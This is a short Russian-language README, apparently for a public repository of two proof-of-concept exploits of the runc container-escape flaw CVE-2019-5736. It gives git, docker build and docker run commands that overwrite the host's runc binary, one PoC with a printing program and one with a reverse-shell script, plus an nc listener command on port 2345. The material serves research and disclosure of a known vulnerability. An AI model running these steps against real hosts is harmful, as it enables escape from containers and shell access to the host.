
CVE-2019-5736 POCs
Два PoC для CVE-2019-5736. См. Twistlock Labs с объяснением CVE-2019-5736 и PoC.
PoC вредоносного образа во многом основан на PoC от q3k, так что вся заслуга принадлежит ему.
Обратите внимание, что запуск PoC перезапишет бинарный файл runc на хосте. Рекомендуется создать копию вашего бинарного файла runc (обычно находится в /usr/sbin/runc) перед запуском одного из PoC.
Клонируйте репозиторий:
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736
Перезаписывает runc простой программой, которая выводит строку.
Запуск exec PoC:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:exec_POC ./exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash
Перезаписывает runc простым bash-скриптом обратной оболочки, который подключается к localhost:2345.
Прослушивайте порт для обратной оболочки:
$ nc -nvlp 2345
Из другого терминала запустите PoC вредоносного образа:
$ cd RunC-CVE-2019-5736
$ docker build -t cve-2019-5736:malicious_image_POC ./malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC